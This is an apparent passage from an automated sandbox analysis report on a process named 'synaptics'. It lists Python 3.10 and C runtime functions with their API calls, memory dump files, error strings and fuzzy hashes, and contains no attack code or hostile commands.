                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyThread_acquire_lock_timed.PYTHON310(000000FF,000000FF,00000000,00000000,00000000,?,6C4B138A,00000000), ref: 6C4A5BAA
                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(00000000), ref: 6C4A5BEC
                                                                                                                                                                                                      • ReleaseSemaphore.KERNEL32(?,00000001,00000000), ref: 6C4A5C0B
                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(00000000), ref: 6C4A5C12
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CriticalSection$EnterLeaveReleaseSemaphoreThread_acquire_lock_timed
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2688090255-0
                                                                                                                                                                                                      • Opcode ID: 2b2704d77c1eb4dd6a831a2cc55df3dfa31ca88ba6bd887b31174b2d47eafc0f
                                                                                                                                                                                                      • Instruction ID: 9cd0c8adf81ac4f53073c78a74c714e2c575139bea0809d1d82fb360427a383f
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2b2704d77c1eb4dd6a831a2cc55df3dfa31ca88ba6bd887b31174b2d47eafc0f
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 31116D31616A10AFCB20DF69CD05F46BBA8FB01722F150619AD24A7794D774F941CBD4
                                                                                                                                                                                                      Function 6C48BCB0 Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyInterpreterState_LookUpID.PYTHON310(?,?), ref: 6C48BCC2
                                                                                                                                                                                                        • Part of subcall function 6C58EA10: PyThread_acquire_lock_timed.PYTHON310(000000FF,000000FF,00000000,?,?,?,?,?,6C48BCC7,?,?), ref: 6C58EA40
                                                                                                                                                                                                        • Part of subcall function 6C58EA10: EnterCriticalSection.KERNEL32(?), ref: 6C58EA7D
                                                                                                                                                                                                        • Part of subcall function 6C58EA10: ReleaseSemaphore.KERNEL32(?,00000001,00000000), ref: 6C58EA9C
                                                                                                                                                                                                        • Part of subcall function 6C58EA10: LeaveCriticalSection.KERNEL32(?), ref: 6C58EAA3
                                                                                                                                                                                                        • Part of subcall function 6C58EA10: PyErr_Format.PYTHON310(unrecognized interpreter ID %lld,?,?,?,?,?,?,?,6C48BCC7,?,?), ref: 6C58EAC8
                                                                                                                                                                                                      • _PyInterpreterState_IDIncref.PYTHON310(00000000), ref: 6C48BCD1
                                                                                                                                                                                                        • Part of subcall function 6C58EB60: _PyInterpreterState_IDInitref.PYTHON310(6C48BCD6,00000000,?,?,6C48BCD6,00000000), ref: 6C58EB6C
                                                                                                                                                                                                      • _PyObject_New.PYTHON310(?), ref: 6C48BCE2
                                                                                                                                                                                                      • _PyInterpreterState_IDDecref.PYTHON310(00000000), ref: 6C48BCEF
                                                                                                                                                                                                        • Part of subcall function 6C58EBE0: PyThread_acquire_lock_timed.PYTHON310(08758B56,000000FF,000000FF,00000000,?,00000000,?,?,?,6C48BCF4,00000000), ref: 6C58EBF6
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: InterpreterState_$CriticalSectionThread_acquire_lock_timed$DecrefEnterErr_FormatIncrefInitrefLeaveLookObject_ReleaseSemaphore
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2296296526-0
                                                                                                                                                                                                      • Opcode ID: 091b98df278a82ca04f99f20420f6c5932273a3faffd8ebed6868b698ca38020
                                                                                                                                                                                                      • Instruction ID: d1c70e91fa080c9e69bc42129125515c7f036d489eed7494eb39f9912d8c5927
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 091b98df278a82ca04f99f20420f6c5932273a3faffd8ebed6868b698ca38020
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4FF05977A075182A5210976B7C45CCBB7DCDAC203AB0442BBED0DD3B11FA61D90482F2
                                                                                                                                                                                                      Function 6C590ED0 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C590EEF
                                                                                                                                                                                                      • _errno.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C590EF7
                                                                                                                                                                                                      • __control87_2.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000000,00000000,?,00000000), ref: 6C590F10
                                                                                                                                                                                                      • _Py_dg_strtod.PYTHON310(?,?), ref: 6C590F46
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: _errno$Py_dg_strtod__control87_2
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 223240187-0
                                                                                                                                                                                                      • Opcode ID: 6b29164b9a11416e96b5714a9b9caf8b6c1bb9810588bf7a0074b32c520aae26
                                                                                                                                                                                                      • Instruction ID: 38975ca9943b22f83ce2e627fe0ba9112ed8cac0dc448073f6311ed18c7875a4
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6b29164b9a11416e96b5714a9b9caf8b6c1bb9810588bf7a0074b32c520aae26
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4DF024329146089FD700EF58CC01B6B77BCFF8A324F05064AF954A7180D7B47A008BE6
                                                                                                                                                                                                      Function 73A866D1 Relevance: 6.0, APIs: 4, Instructions: 21COMMONLIBRARYCODE
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • __EH_prolog3_catch.LIBCMT ref: 73A866D8
                                                                                                                                                                                                      • unexpected.VCRUNTIME140(00000004,73A86178,00000000,?,?,?,?,19930522,00000000,1FFFFFFF,73A86435,?,?,00000000,00000000,00000000), ref: 73A866EC
                                                                                                                                                                                                        • Part of subcall function 73A87630: __telemetry_main_return_trigger.VCRUNTIME140 ref: 73A8763F
                                                                                                                                                                                                        • Part of subcall function 73A87630: terminate.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 73A87647
                                                                                                                                                                                                      • _CxxThrowException.VCRUNTIME140(00000000,00000000,00000004,73A86178,00000000,?,?,?,?,19930522,00000000,1FFFFFFF,73A86435,?,?,00000000), ref: 73A86700
                                                                                                                                                                                                        • Part of subcall function 73A87550: __telemetry_main_return_trigger.VCRUNTIME140(Bad dynamic_cast!,00000000,?,?,?,73A87292,?,73A8EFF8), ref: 73A87580
                                                                                                                                                                                                        • Part of subcall function 73A87550: RaiseException.KERNEL32(E06D7363,00000001,00000003,73A87292,?,?,?,73A87292,?,73A8EFF8), ref: 73A875B0
                                                                                                                                                                                                      • abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(00000004,73A86178,00000000,?,?,?,?,19930522,00000000,1FFFFFFF,73A86435,?,?,00000000,00000000,00000000), ref: 73A86705
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2400247419.0000000073A81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 73A80000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400207783.0000000073A80000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400282440.0000000073A90000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400313265.0000000073A91000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_73a80000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Exception__telemetry_main_return_trigger$H_prolog3_catchRaiseThrowabortterminateunexpected
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2816766880-0
                                                                                                                                                                                                      • Opcode ID: 32659f52e2b4e3ef5e264f2d97b898f513515065419abba6aee46571e52ad465
                                                                                                                                                                                                      • Instruction ID: 548c5c58ee4ccca385b139851fb37523d189655452acb967adbaa0207958152d
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 32659f52e2b4e3ef5e264f2d97b898f513515065419abba6aee46571e52ad465
                                                                                                                                                                                                      • Instruction Fuzzy Hash: D3E0E2B1910348DFF70BAFA58607BC83261AB10716F11400AD2081A3E8CABA8685CFA2
                                                                                                                                                                                                      Function 6C4D1F70 Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 216COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 6C4D1EA0: PyErr_Format.PYTHON310(character U+%x is not in range [U+0000; U+%x],?,0010FFFF,?,?,?,?,?,6C4D1FA1,?,?), ref: 6C4D1F47
                                                                                                                                                                                                      • _PyErr_NoMemory.PYTHON310(00000000,?,?,?), ref: 6C4D1FF2
                                                                                                                                                                                                      • PyObject_Malloc.PYTHON310(?,?,?,?), ref: 6C4D2165
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_$FormatMallocMemoryObject_
                                                                                                                                                                                                      • String ID: @xJl
                                                                                                                                                                                                      • API String ID: 1357596229-2921346101
                                                                                                                                                                                                      • Opcode ID: 6d189e4eb4d3fb468b4c20b5d2c3cc6323b9db7b4f7adb357e17d51f833224e6
                                                                                                                                                                                                      • Instruction ID: 043a5db7049b3935045f150b7ad18275336bdaf51c81815c63520d14eedbdd63
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6d189e4eb4d3fb468b4c20b5d2c3cc6323b9db7b4f7adb357e17d51f833224e6
                                                                                                                                                                                                      • Instruction Fuzzy Hash: E8819B71600B018BD731DF28C454B56BBF1BB89328F148B2DD4A6C7B90DB35F9098B91
                                                                                                                                                                                                      Function 6C464A50 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 181COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_SetObject.PYTHON310(?,6C73BD78,00000000,00000000,00000000,00000000), ref: 6C464B33
                                                                                                                                                                                                      • PyUnicode_New.PYTHON310(00000003,0000007F), ref: 6C464B60
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • bytes object is too large to make repr, xrefs: 6C464B1E
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_ObjectUnicode_
                                                                                                                                                                                                      • String ID: bytes object is too large to make repr
                                                                                                                                                                                                      • API String ID: 4264247355-2689921278
                                                                                                                                                                                                      • Opcode ID: 554e93a3ad9729caf0546ee52c2164bd2d75bb6ebcac332866162ce4059dc75a
                                                                                                                                                                                                      • Instruction ID: 278c4d4b7674a78f1dd1436ad6fb158a99be0f150b5700e38907dff88a908f42
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 554e93a3ad9729caf0546ee52c2164bd2d75bb6ebcac332866162ce4059dc75a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A7516B31208341CFEB05CE2AC860F27BBE1EB9735AF195199E4A44BF9AC7748C05C792
                                                                                                                                                                                                      Function 6C483EE0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 133COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_SetObject.PYTHON310(?,6C73D6C0,00000000,00000000,00000000,00000000), ref: 6C483F70
                                                                                                                                                                                                      • ldexp.API-MS-WIN-CRT-MATH-L1-1-0 ref: 6C483FE6
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • can't unpack IEEE 754 special value on non-IEEE platform, xrefs: 6C483F59
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_Objectldexp
                                                                                                                                                                                                      • String ID: can't unpack IEEE 754 special value on non-IEEE platform
                                                                                                                                                                                                      • API String ID: 1268337012-26340962
                                                                                                                                                                                                      • Opcode ID: b799bcea9eda18c2f4ba3f214a216ef20f32e2dff2378c955e8b06ed4e835248
                                                                                                                                                                                                      • Instruction ID: e0434e2c3262e407f3d8e28219ea5869fb5e3b4f59ae943159221a49f95efddf
                                                                                                                                                                                                      • Opcode Fuzzy Hash: b799bcea9eda18c2f4ba3f214a216ef20f32e2dff2378c955e8b06ed4e835248
                                                                                                                                                                                                      • Instruction Fuzzy Hash: FE4127316093449FC701CE39C410A6A7BF4EF8A369F1886AEF8988B781E730D559C791
                                                                                                                                                                                                      Function 6C563990 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 125COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_SetObject.PYTHON310(?,6C73BFE8,00000000,00000000,00000000,00000000), ref: 6C5639CC
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_Object
                                                                                                                                                                                                      • String ID: an instance of ContextVar was expected$p^tl
                                                                                                                                                                                                      • API String ID: 1617383179-1670124983
                                                                                                                                                                                                      • Opcode ID: 9b4daa4b616472dd94f6b51b5bc0dc8368899c9a1e27374ec4550612bd6e78b3
                                                                                                                                                                                                      • Instruction ID: 94a9fb239cdfa79a2d351561b42defb77b42e9152315066ebe7a1b65d60d3b78
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9b4daa4b616472dd94f6b51b5bc0dc8368899c9a1e27374ec4550612bd6e78b3
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 7B418B317046059FD314CE6AE880B56B3F5FB85324F64876AE86DC7B90E731F8158B90
                                                                                                                                                                                                      Function 6C492D60 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 101COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • _PyErr_Format.PYTHON310(?,%s:%d: bad argument to internal function,D:\a\1\s\Objects\longobject.c,000004C2,?,00000000,?,?,?,?,?,6C492EBF), ref: 6C492E33
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      • D:\a\1\s\Objects\longobject.c, xrefs: 6C492E22
                                                                                                                                                                                                      • %s:%d: bad argument to internal function, xrefs: 6C492E27
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C6A4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399910300.000000006C731000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399947514.000000006C732000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399989928.000000006C735000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400025715.000000006C749000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400060272.000000006C74A000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400099015.000000006C751000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400134419.000000006C779000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2400167169.000000006C77C000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_7_2_6c380000_synaptics.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Err_Format
                                                                                                                                                                                                      • String ID: %s:%d: bad argument to internal function$D:\a\1\s\Objects\longobject.c
                                                                                                                                                                                                      • API String ID: 376477240-3761076943
                                                                                                                                                                                                      • Opcode ID: 056246bf5121523e62531050b2a62b31aad8341eff09a510fccf03c6a88cabbc
                                                                                                                                                                                                      • Instruction ID: 6811c916fc3a7214db9492cc9b1a44835f73e1b90dee7b958281330750276bec
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 056246bf5121523e62531050b2a62b31aad8341eff09a510fccf03c6a88cabbc
                                                                                                                                                                                                      • Instruction Fuzzy Hash: CB216173B0011856DB14D97DDC84DBAF769DBC5235B148375F92CD7681DA32980683E0
                                                                                                                                                                                                      Function 6C5B7D70 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97COMMON
                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • PyUnicode_FromString.PYTHON310(?), ref: 6C5B7DBB
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000007.00000002.2399379768.000000006C381000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C380000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399343450.000000006C380000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                      • Associated: 00000007.00000002.2399606581.000000006C5CC000.00000002.00000001.01000000.00000009.sdmpDownload File
